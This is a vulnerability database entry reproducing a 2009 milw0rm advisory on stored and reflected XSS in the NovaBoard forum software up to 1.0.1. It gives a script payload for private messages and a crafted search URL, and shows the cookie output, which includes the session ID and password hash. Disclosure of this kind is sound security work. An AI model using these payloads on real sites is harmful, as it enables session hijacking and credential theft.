Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 22 Views

NovaBoard <= 1.0.1 Persistent XSS Vulnerability found in index.ph

Code

                                                -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NovaBoard &#60;= 1.0.1 / XSS Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: NovaBoard
$ Version: &#60;= 1.0.1
$ File affected: index.php
$ Download: http://www.novaboard.net/


Found by Pepelux &#60;pepelux[at]enye-sec.org&#62;
eNYe-Sec - www.enye-sec.org


-- About the program (by the author&#39;s page) --

NovaBoard is a free, feature rich community message board software written in
PHP & MySQL that allows you to set up your own forum within minutes.
With a smart modules feature and the ease of creating your own themes you can
style and manipulate your board to look and perform how you want.
NovaBoard makes running a message board a breeze!


-- Bug --

You can inject JS.


-- Exploit --

Persistent XSS:
You can write a message to another user of the forum and inject XSS code:

Message subject:
Message recipient:
Message:
&#60;script&#62;alert(document.cookie)&#60;/script&#62;

you can also send the user cookie to another site

Non-persistent XSS:
http://site.com/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=

Response:

If you are an authenticated user you&#39;ll see something like this:

PHPSESSID=241092c53c1379df01b743d910f61c62; nova_name=Member;
nova_password=f11d8a080797894ad3e714fa2f849c62

Username and password are stored in the cookie.


If you are not authenticated:

PHPSESSID=241092c53c1379df01b743d910f61c62

# milw0rm.com [2009-03-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
novaboardversion 1.0.1php & mysqlpersistent xsssecurity vulnerabilityindex.phpexploitenye-seccookiemilw0rm
22